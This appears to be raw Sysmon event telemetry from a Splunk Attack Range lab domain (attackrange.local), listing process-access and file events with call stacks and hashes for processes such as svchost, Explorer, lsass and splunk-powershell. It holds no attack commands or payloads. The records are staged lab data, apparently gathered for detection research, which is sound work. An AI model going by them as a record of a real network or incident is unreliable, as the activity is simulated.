08:04:24.307{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809724Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
08:04:24.307{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809723Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:04:24.307{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809722Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
08:04:24.307{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809721Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:04:24.307{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809720Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
08:04:24.307{0C1E0330-048F-60E8-0500-00000000D001}412428C:\Windows\system32\csrss.exe{0C1E0330-F788-60EB-C779-00000000D001}1220C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000809719Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:04:24.291{0C1E0330-050B-60E8-9B00-00000000D001}10203368C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{0C1E0330-F788-60EB-C779-00000000D001}1220C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000809718Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:04:24.292{0C1E0330-F788-60EB-C779-00000000D001}1220C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" 
--ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{0C1E0330-048F-60E8-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{0C1E0330-050B-60E8-9B00-00000000D001}1020C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000809717Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:04:24.151{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=122205FC4C2913A64D595C65D910CA1A,SHA256=1ED4D2E8A40AB8AF21B4FF04FEE92B5550BD5B9D937357742F4F56AD3C6DCE7F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001053390Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:04:24.971{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SystemMD5=B7ECE222DC7423A14F8E471ADB8BB80A,SHA256=DBDCAF7697BB96A9EE9FC2B3D8BBADF435832B3CD39259EB17F7DB78E77B502B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001053389Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:04:24.971{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SystemMD5=A2D20EF768FB2C07C3C74310B079A85C,SHA256=46EDC1AD2E434E37016C0E699297125EA5FC2FAE93671EFB66C59E82FA8503A8,IMPHASH=00000000000000000000000000000000falsetrue 
23542300x80000000000000001053388Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:04:24.855{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=6A8C8F769D9D4B1045C3DECE4CAC3EC3,SHA256=426F1DE0404A00EA61FE72CA65210381613FC465255C3C9CB3F721CB8CFEB400,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001053387Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:04:24.387{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=2942D711F1BC61FE851E5DC96B1E70D5,SHA256=F89FCC9C6E917111D699CEA957EE9718A4F548CA2AF0D8DB38DCA0D7E727687C,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001053386Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:04:24.387{466BC892-32D3-60E8-770B-00000000CF01}63563256C:\Windows\Explorer.EXE{466BC892-F788-60EB-CF7D-00000000CF01}8372C:\Windows\system32\OpenWith.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61d9f|C:\Windows\System32\SHELL32.dll+62945|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+7b7ef|C:\Windows\System32\windows.storage.dll+7a56f|C:\Windows\System32\windows.storage.dll+7d51f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053385Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:04:24.371{466BC892-32D3-60E8-770B-00000000CF01}63563256C:\Windows\Explorer.EXE{466BC892-F788-60EB-CF7D-00000000CF01}8372C:\Windows\system32\OpenWith.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+6285e|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+7b7ef|C:\Windows\System32\windows.storage.dll+7a56f|C:\Windows\System32\windows.storage.dll+7d51f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053384Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:04:24.371{466BC892-32D3-60E8-770B-00000000CF01}63563256C:\Windows\Explorer.EXE{466BC892-F788-60EB-CF7D-00000000CF01}8372C:\Windows\system32\OpenWith.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61724|C:\Windows\System32\SHELL32.dll+62827|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+7b7ef|C:\Windows\System32\windows.storage.dll+7a56f|C:\Windows\System32\windows.storage.dll+7d51f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053383Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:04:24.371{466BC892-32D3-60E8-770B-00000000CF01}63567232C:\Windows\Explorer.EXE{466BC892-F788-60EB-CF7D-00000000CF01}8372C:\Windows\system32\OpenWith.exe0x101000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\Windows.UI.Immersive.dll+1d16|C:\Windows\System32\Windows.UI.Immersive.dll+2362|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+1d03|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+618c3|C:\Windows\System32\combase.dll+27a9|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+6520c|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+61c3f|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+5e336|C:\Windows\System32\combase.dll+5daea|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+5be0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+635e|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+c6ae|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053382Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:04:24.355{466BC892-32D3-60E8-770B-00000000CF01}63567232C:\Windows\Explorer.EXE{466BC892-F788-60EB-CF7D-00000000CF01}8372C:\Windows\system32\OpenWith.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+620bb|C:\Windows\System32\Windows.UI.Immersive.dll+2f6d|C:\Windows\System32\Windows.UI.Immersive.dll+2213|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+1d03|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+618c3|C:\Windows\System32\combase.dll+27a9|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+6520c|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+61c3f|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+5e336|C:\Windows\System32\combase.dll+5daea|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+5be0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+635e|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+c6ae|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000001053381Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:04:24.355{466BC892-32D3-60E8-770B-00000000CF01}63563256C:\Windows\Explorer.EXE{466BC892-F788-60EB-CF7D-00000000CF01}8372C:\Windows\system32\OpenWith.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61d9f|C:\Windows\System32\SHELL32.dll+62945|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+7b7ef|C:\Windows\System32\windows.storage.dll+7a56f|C:\Windows\System32\windows.storage.dll+7d51f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053380Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:04:24.355{466BC892-32D3-60E8-770B-00000000CF01}63563256C:\Windows\Explorer.EXE{466BC892-F788-60EB-CF7D-00000000CF01}8372C:\Windows\system32\OpenWith.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+6285e|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+7b7ef|C:\Windows\System32\windows.storage.dll+7a56f|C:\Windows\System32\windows.storage.dll+7d51f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053379Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:04:24.355{466BC892-32D3-60E8-770B-00000000CF01}63563256C:\Windows\Explorer.EXE{466BC892-F788-60EB-CF7D-00000000CF01}8372C:\Windows\system32\OpenWith.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61724|C:\Windows\System32\SHELL32.dll+62827|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+7b7ef|C:\Windows\System32\windows.storage.dll+7a56f|C:\Windows\System32\windows.storage.dll+7d51f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053378Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:04:24.355{466BC892-32D3-60E8-770B-00000000CF01}63567280C:\Windows\Explorer.EXE{466BC892-F788-60EB-CF7D-00000000CF01}8372C:\Windows\system32\OpenWith.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61d9f|C:\Windows\System32\SHELL32.dll+622c0|C:\Windows\System32\TwinUI.dll+12d491|C:\Windows\System32\TwinUI.dll+12df7f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053377Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:04:24.355{466BC892-32D3-60E8-770B-00000000CF01}63567280C:\Windows\Explorer.EXE{466BC892-F788-60EB-CF7D-00000000CF01}8372C:\Windows\system32\OpenWith.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+47c90|C:\Windows\System32\SHELL32.dll+6227c|C:\Windows\System32\TwinUI.dll+12d491|C:\Windows\System32\TwinUI.dll+12df7f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053376Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:04:24.355{466BC892-32D3-60E8-770B-00000000CF01}63567280C:\Windows\Explorer.EXE{466BC892-F788-60EB-CF7D-00000000CF01}8372C:\Windows\system32\OpenWith.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61724|C:\Windows\System32\SHELL32.dll+62250|C:\Windows\System32\TwinUI.dll+12d491|C:\Windows\System32\TwinUI.dll+12df7f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053375Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:04:24.355{466BC892-32D3-60E8-770B-00000000CF01}63567280C:\Windows\Explorer.EXE{466BC892-F788-60EB-CF7D-00000000CF01}8372C:\Windows\system32\OpenWith.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\TwinUI.dll+12d2c9|C:\Windows\System32\TwinUI.dll+12df7f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053374Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:04:24.349{466BC892-02AF-60E8-1000-00000000CF01}4321692C:\Windows\system32\svchost.exe{466BC892-F788-60EB-CF7D-00000000CF01}8372C:\Windows\system32\OpenWith.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6cc4|c:\windows\system32\fntcache.dll+17acf|c:\windows\system32\fntcache.dll+1a697|c:\windows\system32\fntcache.dll+1aacc|c:\windows\system32\fntcache.dll+5034e|c:\windows\system32\fntcache.dll+50052|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053373Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:04:24.334{466BC892-02AF-60E8-1000-00000000CF01}4321692C:\Windows\system32\svchost.exe{466BC892-F788-60EB-CF7D-00000000CF01}8372C:\Windows\system32\OpenWith.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6cc4|c:\windows\system32\fntcache.dll+17acf|c:\windows\system32\fntcache.dll+1a697|c:\windows\system32\fntcache.dll+1aacc|c:\windows\system32\fntcache.dll+5034e|c:\windows\system32\fntcache.dll+50052|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053372Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:04:24.334{466BC892-02AF-60E8-1000-00000000CF01}4321692C:\Windows\system32\svchost.exe{466BC892-F788-60EB-CF7D-00000000CF01}8372C:\Windows\system32\OpenWith.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6cc4|c:\windows\system32\fntcache.dll+17acf|c:\windows\system32\fntcache.dll+1a697|c:\windows\system32\fntcache.dll+1aacc|c:\windows\system32\fntcache.dll+5034e|c:\windows\system32\fntcache.dll+50052|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053371Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:04:24.334{466BC892-32D3-60E8-730B-00000000CF01}59843788C:\Windows\System32\taskhostw.exe{466BC892-F788-60EB-CF7D-00000000CF01}8372C:\Windows\system32\OpenWith.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\MSCTF.dll+af11|C:\Windows\System32\MSCTF.dll+b489|C:\Windows\System32\MSCTF.dll+be73|C:\Windows\System32\MSCTF.dll+3d832|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053370Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:04:24.334{466BC892-32D3-60E8-730B-00000000CF01}59843788C:\Windows\System32\taskhostw.exe{466BC892-F788-60EB-CF7D-00000000CF01}8372C:\Windows\system32\OpenWith.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\MSCTF.dll+af11|C:\Windows\System32\MSCTF.dll+b489|C:\Windows\System32\MSCTF.dll+be73|C:\Windows\System32\MSCTF.dll+3d832|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053369Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:04:24.255{466BC892-02AD-60E8-0B00-00000000CF01}624800C:\Windows\system32\lsass.exe{466BC892-F788-60EB-CF7D-00000000CF01}8372C:\Windows\system32\OpenWith.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+24c07|C:\Windows\system32\lsasrv.dll+25d4d|C:\Windows\system32\lsasrv.dll+24a85|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053368Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:04:24.255{466BC892-02AD-60E8-0B00-00000000CF01}624800C:\Windows\system32\lsass.exe{466BC892-F788-60EB-CF7D-00000000CF01}8372C:\Windows\system32\OpenWith.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\system32\lsasrv.dll+249cd|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053367Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 